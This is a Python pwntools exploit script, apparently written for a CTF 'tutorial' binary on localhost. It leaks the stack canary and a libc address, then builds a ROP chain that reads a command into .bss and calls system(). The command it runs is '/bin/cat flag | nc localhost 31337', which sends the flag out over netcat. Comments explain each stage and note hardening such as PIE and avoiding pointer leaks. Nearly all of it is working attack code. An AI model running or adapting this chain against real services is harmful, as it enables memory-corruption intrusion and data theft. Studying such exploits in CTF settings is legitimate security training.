
: ) 바이너리 안에 없는 가젯은 libc에서 찾자


from pwn import *

# Session plus the two images the rest of the script takes addresses from:
# libc supplies symbol offsets and the pop-rdx gadget, the target binary
# supplies its PLT and .bss addresses. Both are loaded up front, libc first,
# before anything is sent.
s = remote("localhost", 1233)
libc, elf = ELF("./libc"), ELF("./tutorial")

def manual():
    """Select menu option 1 ("manual") once the ``>`` prompt arrives.

    The script afterwards waits for a ``Reference:`` line from the service,
    so this option is the one that triggers the address disclosure.
    """
    s.sendlineafter(">", "1")


def practice(content):
    """Select menu option 2 ("practice") and submit *content* as the input.

    *content* is written only after the service prints
    ``Time to test your exploit...``.  It goes out via ``sendline``, so a
    trailing newline is appended -- worth remembering when sizing it.
    """
    s.sendlineafter(">", "2")
    s.sendlineafter("Time to test your exploit...", content)

def quit():
    """Select menu option 3.  Not called anywhere in this script.

    NOTE: the name shadows the ``quit`` builtin; harmless here because
    nothing relies on the builtin, but a distinct name would be cleaner.
    """
    s.sendlineafter(">", "3")

# Stage 1 -- canary disclosure.  311 'A's plus sendline's newline go in;
# after the next prompt the service returns 312 bytes (presumably the buffer
# contents) followed by 8 more, which the script takes as the stack canary.
# Stack protector is only as strong as the canary's secrecy: an output path
# that runs past the end of the buffer defeats it.
practice("A" * 311)

s.recvuntil(">")
echoed = s.recv(312)
print(echoed)
canary = u64(s.recv(8))
print("canary : " + hex(canary))


manual()

# Stage 2 -- libc disclosure.  Option 1 is followed by a "Reference:" line
# whose next 14 characters are a hex address; adding 1280 is the script's
# way of turning that into puts' runtime address (the origin of the offset
# is not shown here -- confirm against the binary).  Every other address
# below is derived from the libc base this yields.  With ASLR, a pointer
# printed in a diagnostic message is all it takes to undo the randomisation.
s.recvuntil("Reference:")
puts_libc = int(s.recv(14), 16) + 1280
print("puts_libc : " + hex(puts_libc))

libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
# 0xf02a4 looks like a one_gadget offset for this libc build -- not verified
# here.  Neither one_shot nor bin_sh is used by the chain further down.
one_shot = libc_base + 0xf02a4
bin_sh = libc_base + next(libc.search("/bin/sh\0"))

for label, addr in (("libc_base", libc_base), ("system", system),
                    ("one_shot", one_shot), ("bin_sh", bin_sh)):
    print(label + " : " + hex(addr))

# ROP gadgets.  The three 0x40xxxx values are fixed addresses inside the
# target, which is therefore presumably built without PIE; pop_rdx comes
# from libc instead (the note at the top of the page).  Offsets are taken
# as given on the page, not re-derived here.
pop_rdi = 0x4012e3
pop_rbp = 0x400cd5          # not used by the chain below
pop_rsi_r15 = 0x4012e1
pop_rdx = libc_base + 0x1b92
cmd = "/bin/cat flag | nc localhost 31337"

# Stage 3 -- build the chain.  Layout: 312 bytes of filler, the leaked
# canary put back so the epilogue check passes, 8 bytes for the saved-rbp
# slot, then read(4, bss+0x10, len(cmd)) to stage cmd in .bss and finally
# system(bss+0x10).  fd 4 as read's first argument is presumably the client
# socket rather than stdin -- confirm.
staging = elf.bss() + 0x10

frame = [
    "A" * 312,
    p64(canary),
    "B" * 8,
]
read_cmd = [
    p64(pop_rdi), p64(4),
    p64(pop_rsi_r15), p64(staging), p64(0),   # the 0 is filler for r15
    p64(pop_rdx), p64(len(cmd)),
    p64(elf.plt['read']),
]
run_cmd = [
    p64(pop_rdi), p64(staging),
    p64(system),
]
pay = "".join(frame + read_cmd + run_cmd)

# Stage 4 -- deliver.  The overflow rides the same "practice" path that
# leaked the canary.  Once the chain's read() is waiting, cmd goes out with
# send() rather than sendline(), so exactly len(cmd) bytes arrive -- the
# length the chain placed in rdx.  The session is then handed to the user.
# From a hardening angle this chain needs three things at once: a disclosed
# canary, a disclosed libc address and fixed gadget addresses in the target;
# withholding any one of them (no pointer echo, PIE) breaks it as written.
practice(pay)
s.send(cmd)
s.interactive()

